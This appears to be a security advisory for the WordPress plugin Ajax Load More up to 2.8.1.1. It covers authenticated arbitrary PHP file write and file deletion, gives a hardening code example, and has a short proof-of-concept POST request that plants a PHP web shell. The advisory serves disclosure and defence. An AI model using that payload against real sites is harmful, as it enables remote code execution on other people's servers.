Ajax Load More <= 2.8.1.1 - Authenticated File Upload & Deletion


Description
Authenticated file upload in ajax-load-more/admin/admin.php, in the function alm_save_repeater().

The variable $f is set to a predictable PHP file path, and the content of the variable $c is then written into that file.

The following line shows that this second variable is also set from untrusted input:
$c = Trim(stripslashes($_POST["value"])); // Repeater Value

Therefore, an authenticated attacker can write arbitrary PHP code to the website by sending a POST request to http://<WP-path>/wp-admin/admin-ajax.php

The attacker can then execute the stored PHP code, for example by sending a simple request to http://<WP-path>/wp-content/plugins/ajax-load-more/core/repeater/default.php

Authenticated file deletion in ajax-load-more/admin/admin.php, in the function alm_delete_cache().

$cache = $_POST["cache"];
[...]
$dir = ALM_CACHE_PATH .'_cache/'.$cache;
[...]
foreach (glob($dir."/*.*") as $filename) {
[...]
unlink($filename);
[...]
rmdir($dir);
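The two handlers above share the same root causes: the request is not tied to a sufficiently privileged user, and a POST parameter reaches the filesystem unchecked. The following PHP is an added example written for this page, not code from the plugin or from its 2.8.1.2 fix. The function names alm_safe_cache_dir() and alm_delete_cache_dir() and the nonce action 'alm_repeater_nonce' are assumptions; check_ajax_referer(), current_user_can(), wp_send_json_error() and wp_send_json_success() are real WordPress functions. The first part runs stand-alone on the PHP CLI against a constructed temporary directory; the handler registration at the end only takes effect when the file is loaded inside WordPress.

```php
<?php
// Added example, not the plugin's code. Hardened handling of the $_POST["cache"]
// value that alm_delete_cache() passes straight into glob()/unlink()/rmdir().

/**
 * Return the absolute directory for cache name $cache under $base, or false
 * if the name is not a plain identifier or resolves outside $base.
 */
function alm_safe_cache_dir(string $base, string $cache)
{
    // Allow-list the name before touching the filesystem: this rejects "..",
    // "/", null bytes and anything else that could change the path.
    if (!preg_match('/^[A-Za-z0-9_-]{1,64}$/', $cache)) {
        return false;
    }
    $baseReal = realpath($base);
    if ($baseReal === false) {
        return false;
    }
    $dirReal = realpath($baseReal . '/' . $cache);
    // The directory must exist and still be inside the cache root after
    // symlink resolution (defense in depth on top of the allow-list).
    if ($dirReal === false || !is_dir($dirReal)) {
        return false;
    }
    if (strpos($dirReal . '/', $baseReal . '/') !== 0) {
        return false;
    }
    return $dirReal;
}

/** Delete regular files in an already validated cache directory; returns the count. */
function alm_delete_cache_dir(string $dir): int
{
    $removed = 0;
    foreach (glob($dir . '/*.*') ?: [] as $filename) {
        // Skip symlinks so a planted link cannot redirect the unlink() elsewhere.
        if (is_file($filename) && !is_link($filename) && unlink($filename)) {
            $removed++;
        }
    }
    @rmdir($dir);
    return $removed;
}

// ---- Stand-alone demonstration on a constructed temporary layout ----
$root = sys_get_temp_dir() . '/alm_demo_' . getmypid();
mkdir("$root/_cache/abc123", 0700, true);
file_put_contents("$root/_cache/abc123/page1.html", '<p>cached</p>');
file_put_contents("$root/secret.txt", 'outside the cache root');

var_dump(alm_safe_cache_dir("$root/_cache", 'abc123') !== false); // bool(true)
var_dump(alm_safe_cache_dir("$root/_cache", '..'));                // bool(false)
var_dump(alm_safe_cache_dir("$root/_cache", 'abc123/../..'));      // bool(false)
var_dump(alm_delete_cache_dir(alm_safe_cache_dir("$root/_cache", 'abc123'))); // int(1)
var_dump(file_exists("$root/secret.txt"));                        // bool(true), untouched

unlink("$root/secret.txt");
rmdir("$root/_cache");
rmdir($root);

// ---- WordPress wiring (only active when loaded inside WordPress) ----
if (function_exists('add_action')) {
    add_action('wp_ajax_alm_delete_cache', function () {
        // Both checks are needed: the nonce ties the request to a page the
        // user actually loaded (anti-CSRF), the capability check keeps
        // low-privilege accounts out of the handler entirely.
        check_ajax_referer('alm_repeater_nonce', 'nonce'); // assumed action name
        if (!current_user_can('manage_options')) {
            wp_send_json_error('forbidden', 403);
        }
        $dir = alm_safe_cache_dir(ALM_CACHE_PATH . '_cache', (string) ($_POST['cache'] ?? ''));
        if ($dir === false) {
            wp_send_json_error('invalid cache name', 400);
        }
        wp_send_json_success(['deleted' => alm_delete_cache_dir($dir)]);
    });
}
```

The same nonce-plus-capability guard belongs at the top of alm_save_repeater(). Because that handler writes the raw POST body into a .php file under the web root, the capability to check is the one WordPress already uses for editing plugin code, edit_plugins, which a site owner can switch off entirely with the DISALLOW_FILE_EDIT constant; a nonce alone only proves the request came from a page the user loaded, not that the user should be allowed to store executable code.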

Proof of Concept
* Arbitrary file upload exploitation:

POST http://<WP-path>/wp-admin/admin-ajax.php

action=alm_save_repeater
nonce=<WP-nonce>
type=default
repeater=blablabla
value=<?php exec($_GET['cmd']) ?>

=> The supplied PHP code will be stored in ajax-load-more/core/repeater/default.php

Affects

Plugin ajax-load-more
fixed in version 2.8.1.2

References

EXPLOITDB 38660
URL https://wordpress.org/plugins/ajax-load-more/changelog/

Classification

Type CSRF
OWASP Top 10 A8: Cross-Site Request Forgery (CSRF)
CWE CWE-352

Miscellaneous

Submitter PizzaHatHacker
Views 634
Verified No
WPVDB ID 8209

Timeline

Publicly Published 2015-10-10
Added 2015-10-11
Last Updated 2015-11-10

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.